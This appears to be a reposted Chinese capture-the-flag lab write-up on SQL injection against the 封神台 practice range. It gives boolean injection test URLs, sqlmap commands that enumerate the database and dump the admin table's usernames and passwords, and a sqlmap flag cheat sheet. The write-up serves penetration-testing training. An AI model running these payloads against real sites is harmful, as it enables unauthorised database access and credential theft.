概述
靶场地址:封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。
http://cntj8003.ia.aqlab.cn/?id=1%20and%201=1--+ 页面正常
http://cntj8003.ia.aqlab.cn/?id=1%20and%201=2--+ 页面不正常
已经可以判断存在注入点
使用sqlmap进行注入
1、首先爆初当前数据库名
python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' --current-db
2、爆当前数据库的所有表
python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' -D 'maoshe' --tables
3、爆admin表的所有字段
python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' -D 'maoshe' -T 'admin' --columns
4、爆出username、password中的所有字段内容
python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' -D 'maoshe' -T 'admin' -C 'username, password' --dump
将admin的密码输入,通关
通过靶场简单练习SQLmap使用
-u
"url"
#检测注入点
--dbs
#列出所有数据库的名称
--current-db #列出当前数据库的名称
-D
#指定一个数据库
--table
#列出所有表名
-T
#指定表名
--columns
#列出所有字段名
-C
#指定字段
--dump
#列出字段内容
最后
以上就是火星上朋友为你收集整理的封神台靶场SQL注入——SQLmap简单使用的全部内容,希望文章能够帮你解决封神台靶场SQL注入——SQLmap简单使用所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复